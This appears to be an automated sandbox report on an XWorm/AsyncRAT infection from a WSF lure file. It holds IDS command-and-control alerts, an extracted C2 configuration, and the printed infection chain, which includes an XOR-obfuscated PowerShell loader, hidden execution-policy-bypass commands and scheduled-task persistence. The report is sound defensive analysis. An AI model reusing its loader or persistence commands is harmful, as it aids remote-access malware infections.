            2024-09-25T09:30:06.093990+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:06.509592+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:06.537619+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:06.722549+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:06.840706+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:11.672331+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:22.313052+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:24.344351+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:32.749390+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:33.468956+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:44.110694+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:48.363811+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:48.480095+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:48.599726+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:52.907251+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:53.735988+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:53.853121+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:53.971785+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:54.089902+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:54.370854+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:57.283156+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:59.094980+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:59.765582+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:31:02.743288+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:31:05.265400+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:31:05.384805+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:31:05.739640+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:31:05.857853+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:31:06.215857+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:31:11.375639+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:31:14.753527+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:31:23.297103+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:31:31.751048+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:31:32.746951+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T09:28:04.020869+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:28:14.661093+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:28:25.305906+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:28:35.973470+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:28:46.582091+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:28:57.439878+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:00.617295+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:06.693107+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:12.346517+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:12.732427+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:12.900428+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:13.943064+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:18.315753+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:28.955634+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:32.361186+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:35.238309+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:36.315050+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:44.548921+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:49.743526+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:29:53.800337+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:00.253103+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:04.509923+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:05.974744+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:06.095464+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:06.511393+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:06.540199+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:06.724474+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:06.842213+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:11.675186+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:22.318074+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:24.406761+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:33.470999+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:44.112759+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:48.365841+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:48.481637+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:48.601533+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:52.909141+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:53.737447+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:53.854627+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:53.973141+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:54.091411+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:54.373408+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:57.289124+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:59.134395+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:30:59.767139+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:05.269986+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:05.386296+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:05.504500+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:05.627791+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:05.741412+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:05.859321+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:05.982130+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:06.100063+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:06.108967+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:06.217483+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:11.383035+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:14.755266+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:23.300481+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            2024-09-25T09:31:31.751915+020028529231Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T09:28:02.698762+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:28:32.951908+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:28:32.951973+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:02.698036+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:32.720920+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:02.734763+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:32.749390+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:31:02.743288+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:31:32.746951+020028528741Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T09:29:49.522424+020028531931Malware Command and Control Activity Detected192.168.2.46399494.198.50.337000TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: ALBANIAH3CKER.WORK.GDAvira URL Cloud: Label: malware
            Source: 0000000C.00000002.4155550243.00000000028D1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["ALBANIAH3CKER.WORK.GD"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 19.2.RegSvcs.exe.400000.0.unpackString decryptor: ALBANIAH3CKER.WORK.GD
            Source: 19.2.RegSvcs.exe.400000.0.unpackString decryptor: 7000
            Source: 19.2.RegSvcs.exe.400000.0.unpackString decryptor: <123456789>
            Source: 19.2.RegSvcs.exe.400000.0.unpackString decryptor: <Xwormmm>
            Source: 19.2.RegSvcs.exe.400000.0.unpackString decryptor: XWorm V5.6
            Source: 19.2.RegSvcs.exe.400000.0.unpackString decryptor: USB.exe

            Software Vulnerabilities

            barindex
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 94.198.50.33:7000 -> 192.168.2.4:63994
            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 94.198.50.33:7000 -> 192.168.2.4:63994
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:63994 -> 94.198.50.33:7000
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:63994 -> 94.198.50.33:7000
            Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:63994 -> 94.198.50.33:7000
            Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49730 -> 188.114.97.3:443
            Source: Malware configuration extractorURLs: ALBANIAH3CKER.WORK.GD
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.4:63994 -> 94.198.50.33:7000
            Source: Joe Sandbox ViewIP Address: 94.198.50.33 94.198.50.33
            Source: Joe Sandbox ViewASN Name: DHUBRU DHUBRU
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: paste.ee
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: ALBANIAH3CKER.WORK.GD
            Source: RegSvcs.exe, 0000000C.00000002.4155550243.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000013.00000002.2547031959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00F581D812_2_00F581D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00F5551012_2_00F55510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00F5BBD812_2_00F5BBD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00F55DE012_2_00F55DE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00F5AE9812_2_00F5AE98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00F551C812_2_00F551C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00F50BA012_2_00F50BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_01210B9219_2_01210B92
            Source: reported_account_violation-pdf-67223451.wsfInitial sample: Strings found which are bigger than 50
            Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000013.00000002.2547031959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: classification engineClassification label: mal100.troj.expl.evad.winWSF@27/8@4/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2516:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\LFkBGpGYMgvmLAi0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_renwvfsz.dr5.ps1Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\reported_account_violation-pdf-67223451.wsf"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "MSFT_ScheduledTask (TaskName = "MicroSoftVisualsUpdater", TaskPath = "\")"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
